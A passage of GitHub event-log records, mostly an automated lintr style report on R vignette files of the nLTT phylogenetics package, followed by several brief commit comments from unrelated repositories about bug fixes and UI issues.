**Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"point\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\", color = id, size = I(0.1)) + \n                                                                                                                                ^\n```\n[inst/doc/vignette_get_nltt_values.R:151:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L151) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L152) *style:* **lines should not be more than 80 characters.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_get_nltt_values.R:152:54:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Commas should always have a space after.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:152:102:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​qplot(t, nltt, data = df, geom = \"blank\", ylim = c(0,1), main = \"Average nLTT plot of phylogenies\") + \n                                                                                                     ^\n```\n[inst/doc/vignette_get_nltt_values.R:154:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_get_nltt_values.R#L154) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_nltt_statistic.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:4:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L4) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:7:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L7) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:13:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L13) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 4---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:21:22:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L21) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:22:22:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​  ape::rcoal(n = 10), \n                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:23:16:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  species_tree, \n               ^\n```\n[inst/doc/vignette_nltt_statistic.R:27:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L27) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 10--------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:35:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L35) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 7, fig.height = 7---------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L39) *style:* **lines should not be more than 80 characters.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:39:20:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                   ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:34:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                 ^\n```\n[inst/doc/vignette_nltt_statistic.R:39:48:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L39) *style:* **Commas should always have a space after.**\n```r\n​rect(par(\"usr\")[1],par(\"usr\")[3],par(\"usr\")[2],par(\"usr\")[4], col = colors()[240])\n                                               ^\n```\n[inst/doc/vignette_nltt_statistic.R:45:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n​  nLTT::nltt_lines(p, lwd = 3, lty = 2, col = grDevices::heat.colors(n = 4)[col_index])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:49:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L49) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:54:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L54) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_exact[i]  <- nLTTstat_exact(species_tree, p)\n                          ^~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:55:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L55) *style:* **Variable and function names should be all lowercase.**\n```r\n​  nltt_stats_approx[i] <- nLTTstat(species_tree, p)\n                          ^~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:59:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L59) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:62:38:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stat_exact = nltt_stats_exact, \n                                     ^\n```\n[inst/doc/vignette_nltt_statistic.R:67:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L67) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:69:14:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L69) *style:* **Trailing whitespace is superfluous.**\n```r\n​  nltt_stats, \n             ^\n```\n[inst/doc/vignette_nltt_statistic.R:70:21:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L70) *style:* **Trailing whitespace is superfluous.**\n```r\n​  id.vars = c(\"id\"), \n                    ^\n```\n[inst/doc/vignette_nltt_statistic.R:76:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L76) *style:* **Trailing whitespace is superfluous.**\n```r\n​  df$method, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:80:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L80) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_nltt_statistic.R:82:13:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​  data = df, \n            ^\n```\n[inst/doc/vignette_nltt_statistic.R:89:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_nltt_statistic.R#L89) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L10) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:12:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L12) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:15:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L15) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:19:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L19) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:21:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L21) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:23:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L23) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:25:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L25) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:28:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L28) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:30:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L30) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:31:37:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:33:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L33) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:37:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L37) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:39:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L39) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:42:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L42) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:46:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L46) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:48:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L48) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:50:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L50) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:52:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L52) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.25, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:55:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L55) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:57:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:58:37:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L58) *style:* **Put spaces around all infix operators.**\n```r\n​points(stretch_matrix, pch = 19, col=\"blue\")\n                                   ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:60:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L60) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:61:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L61) *style:* **lines should not be more than 80 characters.**\n```r\n​newick <- \"((((XD:1,ZD:1):1,CE:2):1,(FE:2,EE:2):1):4,((AE:1,BE:1):1,(WD:1,YD:1):1):5);\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:64:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L64) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​add.scale.bar()\n^~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:66:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L66) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:69:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L69) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:73:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L73) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:75:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:77:2:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L77) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:80:1:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L80) *style:* **lines should not be more than 80 characters.**\n```r\n​stretch_matrix <- nLTT::stretch_nltt_matrix(nltt, dt = 0.05, step_type = \"upper\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/vignette_stretch_nltt_matrix.R:81:27:](https://github.com/richelbilderbeek/nLTT/blob/e0e236aff24d63d71c830077828c13ce7c618269/inst/doc/vignette_stretch_nltt_matrix.R#L81) *style:* **Put spaces around all infix operators.**\n```r\n​points(nltt, pch = 19, col=\"red\")\n                         ~^~\n```\n"}},"created_at":"2016-09-14T08:51:07Z"}
{"id":"4560658114","type":"CommitCommentEvent","actor":{"login":"noamamit92"},"repo":{"name":"ExLibrisGroup/primo-explore-devenv"},"payload":{"comment":{"id":19014672,"position":null,"line":null,"path":null,"commit_id":"e276a31ca2669beef14bd554208a0d5ea1d5c04d","created_at":"2016-09-14T08:51:51Z","updated_at":"2016-09-14T08:51:51Z","body":"closes #3 "}},"created_at":"2016-09-14T08:51:51Z"}
{"id":"4560659909","type":"CommitCommentEvent","actor":{"login":"grendello"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19014674,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T08:52:15Z","updated_at":"2016-09-14T08:52:15Z","body":"@martinwiboe using `.OriginalString` would resurrect [the bug](https://bugzilla.xamarin.com/show_bug.cgi?id=43411) as it would leave whitespace unencoded and the Java URL class performs no encoding on its own (the Java **URI** class does escape the URLs, but I'd rather keep Java API use to minimum for performance reasons) which would lead to error 400 as reported in the bug. Instead, [this PR](https://github.com/xamarin/xamarin-android/pull/222) implements encoding by perusing the `UriBuilder` managed class which does correct work encoding URL query."}},"created_at":"2016-09-14T08:52:15Z"}
{"id":"4560667916","type":"CommitCommentEvent","actor":{"login":"Karamya"},"repo":{"name":"Karamya/2Dimages"},"payload":{"comment":{"id":19014689,"position":null,"line":null,"path":null,"commit_id":"dde4fb9d0c30abe1a4370ac50b488b39689b01f9","created_at":"2016-09-14T08:53:56Z","updated_at":"2016-09-14T08:53:56Z","body":"Double peak fitting - Peak pos, height, FWHM and area (area rough calculation based on FWHM and peak height)"}},"created_at":"2016-09-14T08:53:56Z"}
{"id":"4560668576","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-interactive-video"},"payload":{"comment":{"id":19014691,"position":null,"line":null,"path":null,"commit_id":"d9547ac4bd3204da49a30d76b34b4d34da22b12d","created_at":"2016-09-14T08:54:06Z","updated_at":"2016-09-14T08:54:06Z","body":"Ah, OK, so it only fails when resizing the window while editing? I.e. you won't really have any issues if you have a static theme at about  ~560px ?"}},"created_at":"2016-09-14T08:54:06Z"}
{"id":"4560672469","type":"CommitCommentEvent","actor":{"login":"olegpshenichniy"},"repo":{"name":"sourcefabric/Booktype"},"payload":{"comment":{"id":19014699,"position":null,"line":null,"path":null,"commit_id":"d6212c983c9ba2fcbf6d7d520c86d8dc5c25ea04","created_at":"2016-09-14T08:54:55Z","updated_at":"2016-09-14T08:54:55Z","body":"Hi @eos87 , thanks for this commit, definitely it should be there."}},"created_at":"2016-09-14T08:54:55Z"}
